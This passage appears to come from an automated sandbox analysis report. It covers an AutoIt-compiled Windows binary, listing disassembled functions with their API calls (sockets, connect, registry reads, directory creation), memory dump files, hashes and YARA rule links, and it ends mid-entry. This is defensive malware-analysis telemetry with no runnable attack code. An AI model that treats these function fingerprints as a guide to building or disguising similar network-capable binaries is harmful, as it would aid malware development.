                                                                                                                              • Instruction ID: 4b5c98fc82e9e7eac8044f128f70a67f36248ae473e47babda6ca927e9667589
                                                                                                                              • Opcode Fuzzy Hash: 35550325db39feacb0e7321e0b5a53222dbbfe20d23270946b081e539c72b7f6
                                                                                                                              • Instruction Fuzzy Hash: 39114C71A01208BFEB04EBA4DD86EBE77BCEF14354F104069F506E6191EB70AE41DB50
                                                                                                                              Function 00172E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00172ECB
                                                                                                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00172EEC
                                                                                                                              • ShowWindow.USER32(00000000), ref: 00172F00
                                                                                                                              • ShowWindow.USER32(00000000), ref: 00172F09
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Window$CreateShow
                                                                                                                              • String ID: AutoIt v3$edit
                                                                                                                              • API String ID: 1584632944-3779509399
                                                                                                                              • Opcode ID: fd391c253319bf16dafb0cca9c264fbfd7341fd601900ecf388e4db2f760ea0f
                                                                                                                              • Instruction ID: 133ac70758515b47f60557a01ca344f5381d09aeb1976b1d4971b394bf861f88
                                                                                                                              • Opcode Fuzzy Hash: fd391c253319bf16dafb0cca9c264fbfd7341fd601900ecf388e4db2f760ea0f
                                                                                                                              • Instruction Fuzzy Hash: 07F03470A502D07AE7305B67BC8CE773E7EE7C6F20B01411EBE08A21A0D26108A1DAB0
                                                                                                                              Function 001C936F Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • select.WS2_32(00000000,00000001,00000000,00000000,?), ref: 001C9409
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C9416
                                                                                                                              • __WSAFDIsSet.WS2_32(00000000,00000001), ref: 001C943A
                                                                                                                              • _strlen.LIBCMT ref: 001C9484
                                                                                                                              • _memmove.LIBCMT ref: 001C94CA
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C94F7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLast$_memmove_strlenselect
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2795762555-0
                                                                                                                              • Opcode ID: 9e4b6b7b3fe3a435169544e3f1f5df98554ce297d5bf6afbea634d19e3b0635f
                                                                                                                              • Instruction ID: 65517fce24408abe9d944f7e2fcb57daa1ba4a47db8cf04a99bbe1e0ba885c6a
                                                                                                                              • Opcode Fuzzy Hash: 9e4b6b7b3fe3a435169544e3f1f5df98554ce297d5bf6afbea634d19e3b0635f
                                                                                                                              • Instruction Fuzzy Hash: 2D416375500104AFCB18EBA4DD99FAEB7B9EF68314F108259F51A97291DB30EE41CB60
                                                                                                                              Function 001B6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173B1E: _wcsncpy.LIBCMT ref: 00173B32
                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 001B6DBA
                                                                                                                              • GetLastError.KERNEL32 ref: 001B6DC5
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6DD9
                                                                                                                              • _wcsrchr.LIBCMT ref: 001B6DFB
                                                                                                                                • Part of subcall function 001B6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 001B6E31
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3633006590-0
                                                                                                                              • Opcode ID: 252d25e7876a8cd0c6017d5d33abe462f2814e1ed2e05f33b1d76201a81023b7
                                                                                                                              • Instruction ID: 4becced5300100b2c3600092005198a875149a3dd635e890076c6b08e9372474
                                                                                                                              • Opcode Fuzzy Hash: 252d25e7876a8cd0c6017d5d33abe462f2814e1ed2e05f33b1d76201a81023b7
                                                                                                                              • Instruction Fuzzy Hash: 8E21DF656013189ADF24A7B4EC5AAFE33AD8F21310F200566E425C30E2EB28DE849B54
                                                                                                                              Function 001C9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001CACD3: inet_addr.WS2_32(00000000), ref: 001CACF5
                                                                                                                              • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 001C9160
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C916F
                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 001C918B
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3701255441-0
                                                                                                                              • Opcode ID: 04fd99291ba207d5ca9bd3ee07026af0667f6bb6077bf671c003b7433215e866
                                                                                                                              • Instruction ID: e4eb7a43de7a8f3d490e0c7a28e16e86ff6e62fa2a4b5b44bcd298a02c0f3485
                                                                                                                              • Opcode Fuzzy Hash: 04fd99291ba207d5ca9bd3ee07026af0667f6bb6077bf671c003b7433215e866
                                                                                                                              • Instruction Fuzzy Hash: B6218E312002119FDB04BF68DC9AFBE77A9EF58728F08851DF916AB791DB70E8418B51
                                                                                                                              Function 001CF79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: dE"
                                                                                                                              • API String ID: 0-3908124746
                                                                                                                              • Opcode ID: 9e2d4544f4813bf995eae23b1517e8f1705f2a47d06dad17d1a370d1c1c0981a
                                                                                                                              • Instruction ID: c70a91d41a0a3f52feac8ecc1979405985ae33083f7e4b6dc53ad0442b8aa973
                                                                                                                              • Opcode Fuzzy Hash: 9e2d4544f4813bf995eae23b1517e8f1705f2a47d06dad17d1a370d1c1c0981a
                                                                                                                              • Instruction Fuzzy Hash: BAF16A716083019FC714DF24C880B5ABBE6FF98314F10892EF9999B292D771E946CF82
                                                                                                                              Function 00173DCB Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 258COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00173F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,001734E2,?,00000001), ref: 00173FCD
                                                                                                                              • _free.LIBCMT ref: 001E3C27
                                                                                                                              • _free.LIBCMT ref: 001E3C6E
                                                                                                                                • Part of subcall function 0017BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,002322E8,?,00000000,?,00173E2E,?,00000000,?,0020DBF0,00000000,?), ref: 0017BE8B
                                                                                                                                • Part of subcall function 0017BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00173E2E,?,00000000,?,0020DBF0,00000000,?,00000002), ref: 0017BEA7
                                                                                                                                • Part of subcall function 0017BDF0: __wsplitpath.LIBCMT ref: 0017BF19
                                                                                                                                • Part of subcall function 0017BDF0: _wcscpy.LIBCMT ref: 0017BF31
                                                                                                                                • Part of subcall function 0017BDF0: _wcscat.LIBCMT ref: 0017BF46
                                                                                                                                • Part of subcall function 0017BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0017BF56
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                                                                              • API String ID: 1510338132-1757145024
                                                                                                                              • Opcode ID: 313e3a8f8f5c31e8fc2575abbe8ea1dc033836d46a42e1d65bb363ced7ad747c
                                                                                                                              • Instruction ID: bfe531a2596bee3d1ade35c57cbbf92a06489fa026932b413e3f4fb588547969
                                                                                                                              • Opcode Fuzzy Hash: 313e3a8f8f5c31e8fc2575abbe8ea1dc033836d46a42e1d65bb363ced7ad747c
                                                                                                                              • Instruction Fuzzy Hash: B2918F71910259AFCF08EFA5CC959EEB7B4BF19310F50402AF426EB291EB309A45CB50
                                                                                                                              Function 0019413E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __getstream.LIBCMT ref: 0019418E
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • @_EH4_CallFilterFunc@8.LIBCMT ref: 001941C9
                                                                                                                              • __wopenfile.LIBCMT ref: 001941D9
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                                                                              • String ID: <G
                                                                                                                              • API String ID: 1820251861-2138716496
                                                                                                                              • Opcode ID: abc0c3f0e7fede8081056f7bdc911e9a501321f907ee8b9ca2f2e961ba0c1762
                                                                                                                              • Instruction ID: 0946138588ce03e9ad4ee94bba680c368268cc7a9890083c1eb62fcdc8267ff7
                                                                                                                              • Opcode Fuzzy Hash: abc0c3f0e7fede8081056f7bdc911e9a501321f907ee8b9ca2f2e961ba0c1762
                                                                                                                              • Instruction Fuzzy Hash: 03110270910216ABDF20BFB49C42A6F3BA4BF75350B158539A414CB281EB74D99297A1
                                                                                                                              Function 0018C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0018C948,SwapMouseButtons,00000004,?), ref: 0018C979
                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0018C948,SwapMouseButtons,00000004,?,?,?,?,0018BF22), ref: 0018C99A
                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,0018C948,SwapMouseButtons,00000004,?,?,?,?,0018BF22), ref: 0018C9BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                              • Opcode ID: 831fa9a95c81f03eb26c337557b816d50682733ab87c8e7804d629410aa831dc
                                                                                                                              • Instruction ID: df28e00ea4b3887a633be3c5007c0490c85e08cf2a6c69f9fba81053a814366a
                                                                                                                              • Opcode Fuzzy Hash: 831fa9a95c81f03eb26c337557b816d50682733ab87c8e7804d629410aa831dc
                                                                                                                              • Instruction Fuzzy Hash: FC112776A11218BEDB119FA4DC44EBE7BB8EF04748F1044AAF945E7210E731AE509BA0
                                                                                                                              Function 001AA8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 1be526b335f49d79fa7eddd56bb6e2615621b431e5afa85d7f025e2d7b0409b8
                                                                                                                              • Instruction ID: b61faf1cdc950f02c19fa25c654d5c019e57c90e187994b0613bbbe180fae8c6
                                                                                                                              • Opcode Fuzzy Hash: 1be526b335f49d79fa7eddd56bb6e2615621b431e5afa85d7f025e2d7b0409b8
                                                                                                                              • Instruction Fuzzy Hash: A1C18F79A00216EFCB14CF94C884EAEB7B5FF49704F508599E901EB251D730EE41CBA1
                                                                                                                              Function 001BCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001741A7: _fseek.LIBCMT ref: 001741BF
                                                                                                                                • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF49
                                                                                                                                • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF5C
                                                                                                                              • _free.LIBCMT ref: 001BCDC9
                                                                                                                              • _free.LIBCMT ref: 001BCDD0
                                                                                                                              • _free.LIBCMT ref: 001BCE3B
                                                                                                                                • Part of subcall function 001928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928DE
                                                                                                                                • Part of subcall function 001928CA: GetLastError.KERNEL32(00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928F0
                                                                                                                              • _free.LIBCMT ref: 001BCE43
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1552873950-0
                                                                                                                              • Opcode ID: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                              • Instruction ID: 426506124d7bf7dc9ee27ee86edfd864891724f8422b396800b5b66c0ffb8b8d
                                                                                                                              • Opcode Fuzzy Hash: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
                                                                                                                              • Instruction Fuzzy Hash: 6D512BB1D04218AFDF15DFA4CC81AAEBBB9EF58340F1040AEF61DA3251D7715A808F69
                                                                                                                              Function 00171E58 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00171E87
                                                                                                                                • Part of subcall function 001738E4: _memset.LIBCMT ref: 00173965
                                                                                                                                • Part of subcall function 001738E4: _wcscpy.LIBCMT ref: 001739B5
                                                                                                                                • Part of subcall function 001738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001739C6
                                                                                                                              • KillTimer.USER32(?,00000001), ref: 00171EDC
                                                                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00171EEB
                                                                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001E4526
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1378193009-0
                                                                                                                              • Opcode ID: d278e39ed9ddcc86a8f3efd58f86cf1320896fa5d3d5769800ccbacfdd5e74f0
                                                                                                                              • Instruction ID: fc1d5161b82a7d7a1e17b3b0978a223c872fd05f1014a1efc07c1403bbabce6a
                                                                                                                              • Opcode Fuzzy Hash: d278e39ed9ddcc86a8f3efd58f86cf1320896fa5d3d5769800ccbacfdd5e74f0
                                                                                                                              • Instruction Fuzzy Hash: 3121A7719047D4AFEB3787299855BEFBBEC9F05308F04408DE69E56241C7745A84CB51
                                                                                                                              Function 001C92C0 Relevance: 6.1, APIs: 4, Instructions: 60networkCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
                                                                                                                                • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
                                                                                                                              • gethostbyname.WS2_32(?), ref: 001C92F0
                                                                                                                              • WSAGetLastError.WS2_32(00000000), ref: 001C92FB
                                                                                                                              • _memmove.LIBCMT ref: 001C9328
                                                                                                                              • inet_ntoa.WS2_32(?), ref: 001C9333
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1504782959-0
                                                                                                                              • Opcode ID: 12c7fb827ac924f8fc3df2621caa08c8666c5a6768d90f4e85979e02dbe58579
                                                                                                                              • Instruction ID: 6932a7b93f6bf509a41ab4020b798b77837226d66854ae6304ad56a68dc829f6
                                                                                                                              • Opcode Fuzzy Hash: 12c7fb827ac924f8fc3df2621caa08c8666c5a6768d90f4e85979e02dbe58579
